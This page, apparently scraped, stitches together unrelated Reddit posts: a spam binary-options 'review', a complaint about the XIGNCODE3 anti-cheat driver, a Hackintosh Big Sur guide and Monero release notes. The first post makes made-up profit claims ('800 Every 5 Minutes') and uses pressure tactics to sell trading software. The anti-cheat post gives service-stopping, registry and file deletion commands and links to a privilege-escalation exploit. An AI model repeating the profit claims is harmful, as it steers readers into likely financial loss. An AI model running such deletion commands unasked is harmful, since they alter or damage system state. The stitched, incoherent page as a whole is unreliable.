7 Binary Options – Binary Option Robot

Five Minute Experiment Review 2015 - Is Five Minute Experiment a SCAM or LEGIT? The Best Binary Options Trading Software? The Truth About Five Minute Experiment By James Hawksby - Review

Five Minute Experiment Review 2015 - FIVE MINUTE EXPERIMENT?? Find out the secrets about Five Minute Experiment in this Five Minute Experiment review! So what is the Five Minute Experiment software all about? Does Five Minute Experiment actually work? Is the Five Minute Experiment software a scam, or does it really work?
To find answers to these questions, continue reading my in-depth and honest Five Minute Experiment review below.
Five Minute Experiment Description:
Name: Five Minute Experiment
Niche: Binary Options.
This Proven System Makes 800 Every 5 Minutes Like Clockwork! Watch Here!
Official Web site: Join The Five Minute Experiment!! CLICK HERE NOW!!!
Exactly what is Five Minute Experiment?
Five Minute Experiment is a binary options trading software designed to help traders predict market trends with binary options. The software also offers analyses of market conditions so that traders know what their next step should be. It offers different secret methods that ultimately help traders without the use of any complicated trading indicators or charts.
Five Minute Experiment Binary Options Trading Method
Start with the Five Minute Experiment trading technique on small positions. After you see it working, you can begin to execute your strategy with regular sized lots. This method will pay off over time. Every Forex binary options trader should choose an account type that is in accordance with their requirements and expectations. A bigger account does not mean bigger profit potential, so it is a good idea to start small and quickly add to your account as your returns increase based upon the winning trading choices the software makes.
Binary Options Trading
To help you trade binary options correctly, it is important to understand the fundamentals of binary options trading. Currency trading, or foreign exchange, is based upon the perceived value of two currencies relative to one another, and is affected by the political stability of the country, inflation and interest rates, among other things. Keep this in mind as you trade and learn more about binary options to maximize your learning experience.
Five Minute Experiment Summary
In summary, there are some obvious ideas that have been tested over time, in addition to some more recent methods that you may not have considered. Ideally, as long as you follow what we suggest in this short article, you can either get started trading with Five Minute Experiment or improve on what you have already done.
James Hawksby has partnered with professional traders to create a Binary Options Software That Works!.
There Are Only A Very Limited Number Of Spaces Available
So Act Now Before It's Too Late
Click Here To Claim Your Five Minute Experiment Software LIFETIME User License!!
Tags: Five Minute Experiment app, Five Minute Experiment information, Five Minute Experiment url, Five Minute Experiment website, Five Minute Experiment youtube video, Five Minute Experiment trading software, get Five Minute Experiment, article about Five Minute Experiment, Five Minute Experiment computer program, Five Minute Experiment the truth, Five Minute Experiment support, Five Minute Experiment support email address, Five Minute Experiment help desk, similar than Five Minute Experiment, better than Five Minute Experiment, Five Minute Experiment contact, Five Minute Experiment demo, Five Minute Experiment video tutorial, how does Five Minute Experiment work, is Five Minute Experiment the best online is Five Minute Experiment a scam, does Five Minute Experiment really work, does Five Minute's Experiment actually work, Five Minute Experiment members area, Five Minute Experiment login page, Five Minute Experiment verification, Five Minute Experiment software reviews, Five Minute Experiment no fake review, Five Minute Experiment Live Broadcast, is Five Minute Experiment real, Five Minute Experiment forex trading, Five Minutes Experiment binary options trading, fiveminuteexperiment.co, fiveminuteexperiment.co review, fiveminuteexperiment.co reviews, Five Minute Experiment automated app, the Five Minute Experiment review, Five Minute Experiment signals, Five Minute Experiment mac os x, Five Minute Experiment broker sign up, Five Minute Experiment free download, reviews of Five Minute Experiment, Five Minute Experiment live results, Five Minute Experiment bonus, Five Minute Experiment honest review, Five Minute Experiment 2015, is Five Minute Experiment worth the risk, Five Minute Experiment pc desktop, Five Minute Experiment free trial,Five Minute Experiment testimonial, Five Minute Experiment scam watch dog, Five Minute Experiment warrior forum, Five Minute Experiment web version, Five Minute Experiment open a account, 358 CONSECUTIVE DAYS OF PROFIT, Five Minute Experiment laptop, Five Minute Experiment revised Method 2015, Five Minute Experiment Unbiased review, is Five Minute Experiment all hype?, real people invested in Five Minute Experiment, is Five Minute Experiment a shame, Five Minute Experiment discount, Five Minute Experiment binary option watch dog review, Five Minute Experiment youtube, seriously will Five Minute Experiment work, Five Minute Experiment facebook, Five Minute Experiment activation code, Five Minute Experiment 2015 Working, Five Minute Experiment twitter, Five Minute Experiment currency trading, Five Minute Experiment real person review, Five Minute Experiment example trade, will Five Minute Experiment work on mobile phone, Completely New Five Minute Experiment, Five Minute Experiment customer service, new Five Minute Experiment, Five Minute Experiment webinar, Five Minute Experiment webinar replay, Five Minute Experiment anybody using this, Five Minute Experiment real or fake, is Five Minute Experiment live trades real, Five Minute Experiment is this a scam, is Five Minute Experiment reliable?, Five Minute Experiment honest reviews, Five Minute Experiment is it a scam, Five Minute Experiment download software, Five Minute Experiment app review, Five Minute Experiment software download, Five Minute Experiment forum, Five Minute Experiment signals, Five Minute Experiment download page, Five Minute Experiment software demo somebody using it, Five Minute Experiment binary software, Five Minute Experiment binary options review, Five Minute Experiment members, Five 
Minute Experiment scam or legit,Five Minute Experiment comments, minimum deposit for Five Minute Experiment, Five Minute Experiment reviews, Five Minute Experiment binary today, Five Minute Experiment pro review, Five Minute Experiment windows 7, Five Minute Experiment windows 8 and windows XP, Five Minute Experiment scam or real, Five Minute Experiment login, Five Minute Experiment has anybody out there made any money out of it?, Five Minute Experiment vip membership pass, does Five Minute Experiment work on autopilot?, Five Minute Experiment price, is Five Minute Experiment a scam or not, will Five Minute Experiment help me, real truth about Five Minute Experiment, Five Minute Experiment System, Five Minute Experiment By James Hawksby Review,Five Minute Experiment James Hawksby Reviews, Five Minute Experiment inside members page, 5 Minute Experiment, Five Minute Experiment software downloads, how to download Five Minute Experiment, how to access Five Minute Experiment, Five Minute Experiment Robot, how to use Five Minute Experiment, how to trade with Five Minute Experiment, Five Minute Experiment NEWS Update and details, Five Minute Experiment sign in, the Five Minute Experiment trading options, Five Minute Experiment info, Five Minute Experiment information, Five Minute Experiment searching for new winning trades, Five Minute Experiment today, Five Minute Experiment feedback, Five Minute Experiment real user review, Five Minute Experiment customer reviews, Five Minute Experiment consumer review, Five Minute Experiment Review 2015, insider john Five Minute Experiment review, george s Five Minute Experiment review, Five Minute Experiment doesn't work, is Five Minute Experiment another scam or legit, Five Minute Experiment refund, Activate Five Minute Experiment, review of Five Minute Experiment, log on to Five Minute Experiment, is Five Minute Experiment manual binary trading, Five Minute Experiment bot review, Five Minute Experiment test, Five Minute Experiment explanation, what brokers work with Five Minute Experiment software, what is Five Minute Experiment, Five Minute Experiment news, new version of Five Minute Experiment, Five Minute Experiment fan Page, Five Minute Experiment breaking news, Five Minute Experiment Register, Five Minute Experiment sign up, Five Minute Experiment broker sign up, Five Minute Experiment real proof, how to activate auto trading on Five Minute Experiment,Five Minute Experiment robot, Five Minute Experiment members area, Five Minute Experiment sign in, web version Five Minute Experiment, should i use Five Minute Experiment, Five Minute Experiment yes or no, do i need trading experience, Five Minute Experiment create account, Five Minute Experiment instructions, how to get a Five Minute Experiment demo, Five Minute Experiment special, desktop Five Minute Experiment, Five Minute Experiment Secret method, Join Five Minute Experiment, Five Minute Experiment ea trading app, Five Minute Experiment limited time, Five Minute Experiment pros and cons, Five Minute Experiment bad reviews, is Five Minute Experiment software automatic binary trading, Five Minute Experiment negative and positive review, Five Minute Experiment Author, Five Minute Experiment creator, who made Five Minute Experiment, what is the Five Minute Experiment, Five Minute Experiment real review, Five Minute Experiment broker, Five Minute Experiment sign up broker, Five Minute Experiment sign up broker review, Five Minute Experiment fund broker, Five Minute Experiment how to fund broker,Five Minute 
Experiment deposit funds into broker, how does Five Minute Experiment trade, Five Minute Experiment trading bot, what is Five Minute Experiment and cost?, Five Minute Experiment strategy, Five Minute Experiment password reset, Five Minute Experiment beta tester, Five Minute Experiment comparison, Five Minute Experiment questions and answers, rate & review Five Minute Experiment, rate and reviews Five Minute Experiment, is Five Minute Experiment site legit?, Five Minute Experiment reviews online, is Five Minute Experiment for real, Five Minute Experiment login page, Five Minute Experiment results, Five Minute Experiment winning and losing trades, Five Minute Experiment overview, Five Minute Experiment training, how to setup Five Minute Experiment, Five Minute Experiment home, real testimonial on Five Minute Experiment system, Five Minute Experiment real time trading, start trading with Five Minute Experiment, Five Minute Experiment proof, Five Minute Experiment the truth, Get Five Minute Experiment, Five Minute Experiment Review
Click Here To Read The Comments And See The Five Minute Experiment Software In Action!
submitted by RomriellWegman68 to RomriellWegman

Bluehole - Let's talk Wellbia/XINGCOD3 user privacy risks for the sake of transparency

For those who don't know..
XINGCODE-3 is a kernel-level (ring 0) privileged process, shipped as xhunter1.sys and owned by the Korean company Wellbia (www.wellbia.com). Contrary to what people say, Wellbia isn't owned by or affiliated with Tencent; however, XINGCOD3 is custom-designed under contract for each individual game - mainly games operating in the APAC region, many of them owned by Tencent.
XINGCODE-3 is outsourced to companies as a product tailored to the specific characteristics of each game. The process runs at the most privileged level of the OS from boot and is infamous for being essentially a rootkit - on a malware level, it is highly vulnerable to abuse should Wellbia or any of the third-party companies become the target of an attack.
It has been heavily dissected by the hacking community as being highly intrusive, and it has been reverse engineered (nowadays it is still easily bypassable by a skilled and engaged modder by creating a custom Windows framework).
While most of this is true for any standard anti-cheat, users should be aware that XINGCOD3 is able to scan the entire user memory cache and DLL calls, including physical-state APIs such as GetAsyncKeyState, where it scans the physical state of hardware peripherals - essentially becoming a hardware keylogger. The long history of reverse engineering of this software has shown that Wellbia heavily collects user data for internal processing in order to build whitelists of processes and strings, analyzed by evaluating PE binaries. Having full access to your OS, it is also known to scan user file directories and to collect and store the paths of files modified within the last 48 hours, for the sake of detecting possible sources of bypassing.
All this data is ultimately collected on Wellbia's host servers - also via API calls to Korean servers - in order to run services such as whitelists, improve algorithm accuracy and run comparative statistics and analysis based on binaries, strings and common flags.
Usually this is a high risk for any such service, including BattlEye, EasyAntiCheat, etc., but with Wellbia - and thus Bluehole - a couple of points are actually worrying:
(not to mention you can literally just deny the service from installing, which by itself is already a hilarious facepalm situation, and nowhere does the TSL call for an API of the service)
  1. Starting off, Wellbia is a rather small development company with only one product on the market, sold to rather small companies, the majority of them held by the Chinese government or based in countries where data handling, human rights and user privacy are heavily disregarded. This makes my tinfoil hat think that the studio's network security isn't as fortified as that of a Sony (which has abused rootkits before), due to budget alone. Their website is absolutely atrocious and amateur - and for an international company that deals with international stakeholders and clients, the amount of poor English, errors and ambiguous information in their presentation website is impressive. There are instances where the product name is not even spelled correctly in their own EULA - if a company cannot invest even in basic PR and presentation, it leaves me with the bitter taste that their network security isn't any better. They can handle user binaries, but network security is a completely different line of work. The fact that hackers are easily able to heartbeat their API network servers confirms this for me.
  2. This is the most fun one. Wellbia's website and terms and conditions explicitly say that they're not held accountable should anything happen - terms that you agree to and are legally bound by, by default, when agreeing to Bluehole's terms and conditions: "Limitations of Company Responsibility
  1. IGNCODE3 is a software provided for free to users. Users judge and determine to use services served by software developers and providers, and therefore the company does not have responsibility for results and damages which may have occurred from XIGNCODE3 installation and use.
(the fact that in 1. they can't even be bothered to write the name of their own product correctly shows how little they care about things in general - you can have a look at this whole joke of a ToS, which I could probably put more effort into writing: https://www.wellbia.com/?module=Html&action=SiteComp&sSubNo=5 - so I am sorry if I don't trust where my data goes)
3) It kind of pisses me off that Bluehole adopted this mid-release, after the product had already been purchased. When I initially bought the product, nowhere was it written that user operating system data was being collected by a third-party company on servers located in APAC (and I'm one of those people who heavily reads terms and conditions) - and the current ToS still touches this topic only slightly and ambiguously. It does not say which data gets collected, or disclose who holds it and where - "third party" could be literally anyone - a major disrespect for your consumers. I'm kind of pissed off because when I initially purchased the product, in the very early stages of the game, I didn't agree to any kernel-level data collection held abroad without disclosure of what data is actually being collected; otherwise it would have been a big No on the purchase. Changing the rules of the game and the terms and conditions in the middle of the product's release leaves me with two options: use it on your terms, or don't use a product I've already purchased and which now has no use. Both the in-game changes and these third-party implementations are so different from my initial purchase that it feels like the equivalent of purchasing a shower which in the next year is so heavily modified that it decides to be a toilet.
I would really like for you, Bluehole, to show me the initial terms and conditions from when the game was first released, and to offer me a refund now that you have changed the product and its terms and conditions midway - terms I don't agree with, yet I am left empty-handed with no choice but to abandon the product, turning this purchase into a service I used for X months rather than a good.
I really wish this topic had more visibility, as I know the majority of users are in the dark about this whole thing. I also wish Valve and new game companies would make a real effort, when curating their games in the future, to assert their products' disclosures about data transparency, and to define the limit of how much a product can change and still be considered a valid resemblance of what was purchased - I literally bought a third-person survival shooter and ended up with a rootkit Chinese FPS.
Sincerely, a pissed off customer - who, unlike the majority, is concerned about data privacy - and I hope you're one day held accountable for changing sensitive contract topics such as user privacy mid-release.
-----
EDIT:
For completely removing it from your system should you wish:

Locate the file xhunter1.sys. This file is located in this directory: C:\Windows\xhunter1.sys

Remove the registry entry (using regedit, or reg from a command prompt). The entry is located here: HKEY_LOCAL_MACHINE > SYSTEM > ControlSet001 > Services > xhunter
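For those who prefer an elevated command prompt over clicking through regedit, a rough sketch of the same two steps is below. The paths are the ones listed above, but the service name is assumed to match the registry key, so double-check on your own system before deleting anything, and reboot first so the driver isn't loaded:

sc stop xhunter
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\xhunter" /f
del C:\Windows\xhunter1.sys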


For more information about XINGCOD3 and previous successful abuses which show the malignant potential of the rootkit (kudos to Psychotropos):

- https://x86.re/blog/xigncode3-xhunter1.sys-lpe/
- https://github.com/Psychotropos/xhunter1_privesc
submitted by cosmonauts5512 to PUBATTLEGROUNDS

What's new in macOS 11, Big Sur!

It's that time of year again, and we've got a new version of macOS on our hands! This year we've finally jumped off the 10.xx naming scheme and are now going to 11! And with that, a lot has changed under the hood in macOS.
As with previous years, we'll be going over what's changed in macOS and what you should be aware of as a macOS and Hackintosh enthusiast.

Has Nvidia Support finally arrived?

Sadly, every year I have to answer the obligatory question: no, there is no new Nvidia support. Currently Nvidia's Kepler line is the only natively supported generation.
However, macOS 11 makes some interesting changes to the boot process, specifically moving GPU drivers into stage 2 of booting. Why this is relevant comes down to Apple's initial reason for killing off Web Drivers: Secure Boot. Secure Boot cannot work with Nvidia's Web Drivers because of how early Nvidia's drivers have to initialize, and thus Apple refused to sign the binaries. With Big Sur, third-party GPU support could return; the chances are still super slim, but slightly higher than with 10.14 and 10.15.

What has changed on the surface

A whole new iOS-like UI

Love it or hate it, we've got a new UI more reminiscent of iOS 14, with hints of skeuomorphism (a somewhat subtle callback to previous Mac UIs, which had neat details in the icons).
You can check out Apple's site to get a better idea:

macOS Snapshotting

Snapshotting is a feature initially baked into APFS back in 2017 with the release of macOS 10.13, High Sierra; now macOS's main System volume has become both read-only and snapshotted. What this means is:
However there are a few things to note with this new enforcement of snapshotting:

What has changed under the hood

Quite a few things actually! Both in good and bad ways unfortunately.

New Kernel Cache system: KernelCollections!

So for the past 15 years, macOS has been using the prelinked kernel as a form of kernel and kext caching. With macOS Big Sur's new read-only, snapshot-based system volume, a new form of caching has been developed: KernelCollections!
How this differs from previous OSes:

Secure Boot Changes

With regards to Secure Boot, all officially supported Macs will now support some form of Secure Boot even if there's no T2 present. This is done in 2 stages:
While technically these security features are optional and can be disabled after installation, many features including OS updates will no longer work reliably once disabled. This is due to the heavy reliance on snapshots for OS updates, as mentioned above, so we highly encourage all users to ensure at minimum that SecureBootModel is set to Default or higher.

No more symbols required

This point is the most important part, as this is what we use for kext injection in OpenCore. Currently Apple has left symbols in place, seemingly for debugging purposes; however, this is a bit worrying, as Apple could outright remove symbols in later versions of macOS. For Big Sur's cycle we'll be good on that end, but we'll be keeping an eye on future releases of macOS.

New Kernel Requirements

With this update, the AvoidRuntimeDefrag Booter quirk in OpenCore broke. Because of this, the macOS kernel will fall flat when trying to boot. The reason is that cpu_count_enabled_logical_processors requires the MADT (APIC) table, so OpenCore will now ensure this table is made accessible to the kernel. Users will, however, need a build of OpenCore 0.6.0 with commit bb12f5f or newer to resolve this issue.
Additionally, both Kernel Allocation requirements and Secure Boot have also broken with Big Sur due to the new caching system discussed above. Thankfully these have also been resolved in OpenCore 0.6.3.
To check your OpenCore version, run the following in terminal:
nvram 4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102:opencore-version
If you're not up-to-date and running OpenCore 0.6.3+, see here on how to upgrade OpenCore: Updating OpenCore, Kexts and macOS

Broken Kexts in Big Sur

With the aforementioned KernelCollections, some kexts have unfortunately broken or been hindered in some way. The main kexts that currently have issues are those relying on Lilu's userspace patching functionality:
Thankfully, most important kexts rely on the kernelspace patcher, which is now in fact working again.

MSI Navi installer Bug Resolved

For those receiving boot failures in the installer due to having an MSI Navi GPU installed, macOS Big Sur has finally resolved this issue!

New AMD OS X Kernel Patches

For those running on AMD-based CPUs, you'll want to update your kernel patches as well, since the patches have been rewritten for macOS Big Sur support:

Other notable Hackintosh issues

Several SMBIOS have been dropped

Big Sur dropped a few Ivy Bridge and Haswell based SMBIOS from macOS, so check below to make sure yours wasn't dropped:
If your SMBIOS was supported in Catalina and isn't included above, you're good to go! We also have a more in-depth page here: Choosing the right SMBIOS
For those wanting a simple translation for their Ivy and Haswell Machines:

Dropped hardware

Currently only certain hardware has been officially dropped:

Extra long install process

Due to the new snapshot-based OS, installation now takes some extra time with sealing. If you get stuck at Forcing CS_RUNTIME for entitlement, do not shut down. This will corrupt your install and break the sealing process, so please be patient.

X79 and X99 Boot issues

With Big Sur, IOPCIFamily went through a decent rewrite, causing many X79 and X99 boards to fail to boot and to panic in IOPCIFamily. To resolve this issue, you'll need to disable the unused uncore bridge:
You can also find prebuilts here for those who do not wish to compile the file themselves:

New RTC requirements

With macOS Big Sur, AppleRTC has become much more picky about making sure your OEM correctly mapped the RTC regions in your ACPI tables. This is mainly relevant on Intel's HEDT series boards; I documented how to patch said RTC regions in OpenCorePkg:
For those having boot issues on X99 and X299, this section is super important; you'll likely get stuck at PCI Configuration Begin. You can also find prebuilts here for those who do not wish to compile the file themselves:

SATA Issues

For some reason, Apple removed the AppleIntelPchSeriesAHCI class from AppleAHCIPort.kext. Due to the outright removal of the class, trying to spoof to another ID (generally done by SATA-unsupported.kext) can fail for many and create instability for others.
* A partial fix is to block Big Sur's AppleAHCIPort.kext and inject Catalina's version with any conflicting symbols being patched. You can find a sample kext here: Catalina's patched AppleAHCIPort.kext
* This will work in both Catalina and Big Sur so you can remove SATA-unsupported if you want. However we recommend setting the MinKernel value to 20.0.0 to avoid any potential issues.

Legacy GPU Patches currently unavailable

Due to major changes in many frameworks around GPUs, those using ASentientBot's legacy GPU patches are currently out of luck. We recommend that users with these older GPUs either stay on Catalina until further developments arise or buy an officially supported GPU.

What’s new in the Hackintosh scene?

Dortania: a new organization has appeared

As many of you have probably noticed, a new organization focusing on documenting the hackintoshing process has appeared. Originally under my alias, Khronokernel, I started to transition my guides over to this new family as a way to concentrate the vast amount of information around Hackintoshes to both ease users and give a single trusted source for information.
We work quite closely with the community and developers to ensure the information is correct, up to date and of the best standard. While not perfect in every way, we hope to be the go-to resource for reliable Hackintosh information.
And for the times our information is either outdated, missing context or generally needs improving, we have our bug tracker to allow the community to more easily bring attention to issues and speak directly with the authors:

Dortania's Build Repo

For those who either want to run the latest builds of a kext or need an easy way to test old builds of something, Dortania's Build Repo is for you!
Kexts here are built right after commit, and currently supports most of Acidanthera's kexts and some 3rd party devs as well. If you'd like to add support for more kexts, feel free to PR: Build Repo source

True legacy macOS Support!

As of OpenCore's latest version, 0.6.2, you can now boot every x86-based build of OS X/macOS! A huge achievement on @Goldfish64's part: we now support every major version of kernel cache, both 32- and 64-bit. This means machines like Yonah and newer should work great with OpenCore, and you can even relive the old days of OS X, like OS X 10.4!
And Dortania guides have been updated accordingly to accommodate for builds of those eras, we hope you get as much enjoyment going back as we did working on this project!

Intel Wireless: More native than ever!

Another amazing step forward in the Hackintosh community: near-native Intel WiFi support! Thanks to the endless work of many contributors to the OpenIntelWireless project, we can now use Apple's built-in IO80211 framework to get near-identical support to that of Broadcom wireless cards, including features like network access in recovery and Control Center support.
For more info on the developments, please see the itlwm project on GitHub: itlwm

Clover's revival? A Frankenstein of a bootloader

As many in the community have seen, a new bootloader popped up back in April of 2019 called OpenCore. This bootloader was made by the same people behind projects such as Lilu, WhateverGreen, AppleALC and many other extremely important utilities for both the Mac and Hackintosh communities. OpenCore's design had been properly thought out, with security auditing and proper road mapping laid down; it was clear that this was to be the next stage of hackintoshing for the years we have left with x86.
And now let's bring this back to the old crowd favorite, Clover. Clover has been having a rough time of late, both with the community and stability-wise; with many devs jumping ship to OpenCore and Clover's stability breaking more and more with C++ rewrites, it was clear Clover was on its last legs. Interestingly enough, the community didn't want Clover to die, similarly to how Chameleon lived on through Enoch. And thus, we now have the Clover OpenCore integration project (now merged into master with r5123+).
The goal is to combine OpenCore into Clover, allowing the project to live a bit longer, as Clover in its current state can no longer boot macOS Big Sur or older versions of OS X such as 10.6. As of writing, this project seems a bit confusing, as there is little reason to actually support Clover: many of Clover's properties have feature parity in OpenCore, and trying to combine both C++ and C ruins many of the features and benefits either language provides. The main feature OpenCore does not support is macOS-only ACPI injection; however, the reasoning is covered here: Does OpenCore always inject SMBIOS and ACPI data into other OSes?

Death of x86 and the future of Hackintoshing

With macOS Big Sur, a big turning point is about to happen with Apple and their Macs. As we know, Apple will be shifting to in-house designed Apple Silicon Macs (really just ARM), and thus x86 machines will slowly be phased out of their lineup within 2 years.
What does this mean for both x86-based Macs and Hackintoshing in general? Well, we can expect about 5 years of proper OS support for the iMac20,x series, which was released earlier this year, plus an extra 2 years of security updates. After that, Apple will most likely stop shipping x86 builds of macOS, and hackintoshing as we know it will have passed away.
For those still in denial, hoping something like ARM Hackintoshes will arrive, please consider the following:
So while we may be heartbroken that the journey is coming to a stop in the somewhat near future, hackintoshing will still be a piece of Apple's history. So enjoy it now while we still can, and we here at Dortania will continue supporting the community with our guides till the very end!

Getting ready for macOS 11, Big Sur

This will be your short run down if you skipped the above:
For the last 2, see here on how to update: Updating OpenCore, Kexts and macOS
In regards to downloading Big Sur, currently gibMacOS in macOS or Apple's own software updater are the most reliable methods for grabbing the installer. Windows and Linux support is still unknown, so please stand by as we continue to look into this situation; macrecovery.py may be more reliable if you require the recovery package.
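As a rough illustration of the recovery route (a sketch only - the exact flags may differ between versions of the script, so check its built-in help before relying on this; the board-id and MLB values are placeholders you substitute yourself):

# run from the folder containing macrecovery.py (part of OpenCorePkg's utilities)
python3 macrecovery.py -b <board-id> -m <MLB> download

The downloaded recovery files then go onto your USB as described in the guides linked above.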
And as with every year, the first few weeks to months of a new OS release are painful in the community. We highly advise first-time installers to stay away from Big Sur. The reason is that we cannot determine whether issues are Apple-related or specific to your machine, so it's best to install and debug a machine on a known working OS before testing out the new and shiny.
For more in-depth troubleshooting with Big Sur, see here: OpenCore and macOS 11: Big Sur
submitted by dracoflar to hackintosh

CLI & GUI v0.17.1.3 'Oxygen Orion' released!

This is the CLI & GUI v0.17.1.3 'Oxygen Orion' point release. This release predominantly features bug fixes and performance improvements. Users, however, are recommended to upgrade, as it includes mitigations for the issue where transactions occasionally fail.

(Direct) download links (GUI)

(Direct) download links (CLI)

GPG signed hashes

We encourage users to check the integrity of the binaries and verify that they were signed by binaryFate's GPG key. A guide that walks you through this process can be found here for Windows and here for Linux and Mac OS X.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

# This GPG-signed message exists to confirm the SHA256 sums of Monero binaries.
#
# Please verify the signature against the key for binaryFate in the
# source code repository (/utils/gpg_keys).
#
#
## CLI
38a04a7bd00733e9d943edba3004e44730c0848fe5e8a4fca4cb29c12d1e6b2f monero-android-armv7-v0.17.1.3.tar.bz2
0e94f58572646992ee21f01d291211ed3608e8a46ecb6612b378a2188390dba0 monero-android-armv8-v0.17.1.3.tar.bz2
ae1a1b61d7b4a06690cb22a3389bae5122c8581d47f3a02d303473498f405a1a monero-freebsd-x64-v0.17.1.3.tar.bz2
57d6f9c25bd1dbc9d6b39fcfb13260b21c5594b4334e8ed3b8922108730ee2f0 monero-linux-armv7-v0.17.1.3.tar.bz2
a0419993fbc6a5ca11bcd2e825acef13e429824f4d8c7ba4ec73ac446d2af2fb monero-linux-armv8-v0.17.1.3.tar.bz2
cf3fb693339caed43a935c890d71ecab5b89c430e778dc5ef0c3173c94e5bf64 monero-linux-x64-v0.17.1.3.tar.bz2
d107384ff7b1f77ee4db93940dbfda24d6045bf59c43169bc81a0118e3986bfa monero-linux-x86-v0.17.1.3.tar.bz2
79557c8bee30b229bda90bb9ee494097d639d60948fc2ad87a029359b56b1b48 monero-mac-x64-v0.17.1.3.tar.bz2
3eee0d0e896fb426ef92a141a95e36cb33ca7d1e1db3c1d4cb7383994af43a59 monero-win-x64-v0.17.1.3.zip
c9e9dde61b33adccd7e794eba8ba29d820817213b40a2571282309d25e64e88a monero-win-x86-v0.17.1.3.zip
#
## GUI
15ad80b2abb18ac2521398c4dad9b8bfea2e6fc535cf4ebcc60d99b8042d4fb2 monero-gui-install-win-x64-v0.17.1.3.exe
3bed02f9db5b7b2fe4115a636fecf0c6ec9079dd4e9284c8ce2c67d4996e2a4a monero-gui-linux-x64-v0.17.1.3.tar.bz2
23405534c7973a8d6908b76121b81894dc853039c942d7527d254dfde0bd2e8f monero-gui-mac-x64-v0.17.1.3.dmg
0a49ccccb561445f3d7ec0087ddc83a8b76f424fb7d5e0d725222f3639375ec4 monero-gui-win-x64-v0.17.1.3.zip
#
#
# ~binaryFate
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEgaxZH+nEtlxYBq/D8K9NRioL35IFAl+oVkkACgkQ8K9NRioL
35Lmpw//Xs09T4917sbnRH/DW/ovpRyjF9dyN1ViuWQW91pJb+E3i9TY+wU3q85k
LyTihDB5pV+3nYgKPL9TlLfaytJIQG0vYHykPWHVmYmvoIs9BLarGwaU3bjO0rh9
ST5GDMdvxmQ5Y1LTwVfKkmBJw26DAs0xAvjBX44oRQjjuUdH6JdLPsqa5Kb++NCM
b453m5s8bT3Cw6w0eJB1FQEyQ5BoDrwYcFzzsS1ag/C4Ylq0l6CZfEambfOQvdUi
7D5Rywfhiz2t7cfn7LaoXb74KDA/B1bL+R1/KhCuFqxRTOQzq9IxRywh4VptAAMU
UR7jFHFijOMoyggIbkD48JmAjlBnqIyQJt4D5gbHe+tSaSoKdgoTGBAmIvaCZIng
jfn9pTNzIJbTptsQhhyZqQQIH87D8BctZfX7pREjJmMNGwN2jFxXqUNqYTso20E6
YLtC1mkZBBZ294xHqT1mQpfznc6uVJhhoJpta0eKxkr1ahrGvWBDGZeVhLswnBcq
9dafAkR14rdK1naiCsygb6hMvBqBohVu/bWuhycJcv6XRvlP7UHkR6R8+s6U4Tk2
zaJERQF+cHQpEak5aEJIvDlb/mxteGyvPkPyL7UmADEQh3C4nREwkDSdnitYnF+e
HxJZkshoC98+YCkWUP4+JYOOT158jKao3u0laEOxVGOrPz1Nc64=
=Ys4h
-----END PGP SIGNATURE-----
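If you have not done the verification before, the rough shape of it on Linux looks something like this (a sketch only - the file name of the saved signed message and the exact key file name under utils/gpg_keys in the Monero source repository are assumptions here, so adjust to what you actually have):

# import binaryFate's signing key from a checkout of the Monero source repository
gpg --import utils/gpg_keys/binaryfate.asc
# verify the signature on the signed hash list you saved (e.g. as hashes.txt)
gpg --verify hashes.txt
# compute the hash of the binary you downloaded and compare it to the signed list
sha256sum monero-gui-linux-x64-v0.17.1.3.tar.bz2

The sha256sum output should match the corresponding line in the signed message above; the guides linked at the start of this section walk through the same steps in more detail.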

Upgrading (GUI)

Note that you should be able to utilize the automatic updater in the GUI that was recently added. A pop-up will appear shortly with the new binary.
In case you want to update manually, you ought to perform the following steps:
  1. Download the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux)) from the direct download links in this thread or from the official website. If you run active AV (AntiVirus) software, I'd recommend applying this guide -> https://monero.stackexchange.com/questions/10798/my-antivirus-av-software-blocks-quarantines-the-monero-gui-wallet-is-there
  2. Extract the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux) you just downloaded) to a new directory / folder of your liking.
  3. Open monero-wallet-gui. It should automatically load your "old" wallet.
If, for some reason, the GUI doesn't automatically load your old wallet, you can open it as follows:
[1] On the second page of the wizard (first page is language selection) choose Open a wallet from file
[2] Now select your initial / original wallet. Note that, by default, the wallet files are located in Documents\Monero\ (Windows), Users//Monero/ (Mac OS X), or home//Monero/ (Linux).
Lastly, note that a blockchain resync is not needed, i.e., it will simply pick up where it left off.

Upgrading (CLI)

You ought to perform the following steps:
  1. Download the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux)) from the official website, the direct download links in this thread, or Github.
  2. Extract the new binaries to a new directory of your liking.
  3. Copy over the wallet files from the old directory (i.e. the v0.15.x.x, v0.16.x.x, or v0.17.x.x directory).
  4. Start monerod and monero-wallet-cli (in case you have to use your wallet).
Note that a blockchain resync is not needed. Thus, if you open monerod-v0.17.1.3, it will simply pick up where it left off.
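As a concrete sketch of those steps on Linux (the directory and wallet names below are only examples - adjust them to wherever you keep your old version and wallet files):

# 1./2. download, then extract the new binaries into a directory of your liking
mkdir -p ~/monero-v0.17.1.3
tar -xjf monero-linux-x64-v0.17.1.3.tar.bz2 -C ~/monero-v0.17.1.3
# 3. copy the wallet files over from the old directory (wallet name is an example)
cp ~/monero-v0.16.0.3/mywallet ~/monero-v0.16.0.3/mywallet.keys ~/monero-v0.17.1.3/
# 4. start the daemon and, if needed, the wallet
# (the archive may unpack into its own versioned subdirectory - cd to wherever monerod actually landed)
cd ~/monero-v0.17.1.3
./monerod --detach
./monero-wallet-cli --wallet-file mywallet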

Release notes (GUI)

Some highlights of this minor release are:
  • Android support (experimental)
  • Linux binary is now reproducible (experimental)
  • Simple mode: transaction reliability improvements
  • New transaction confirmation dialog
  • Wizard: minor design changes
  • Linux: high DPI support
  • Fix "can't connect to daemon" issue
  • Minor bug fixes
Some highlights of this major release are:
  • Support for CLSAG transaction format
  • Socks5 proxy support, automatically enabled on Tails
  • Simple mode transactions are sent through the local daemon, improved reliability
  • Portable mode, save wallets + config to "storage" folder
  • History page: improvements, incoming / outgoing labels
  • Transfer: new success dialog
  • CMake build system improvements
  • Windows cross compilation support using Docker
  • Various minor bug and UI fixes
Note that you can find a full change log here.

Release notes (CLI)

Some highlights of this minor release are:
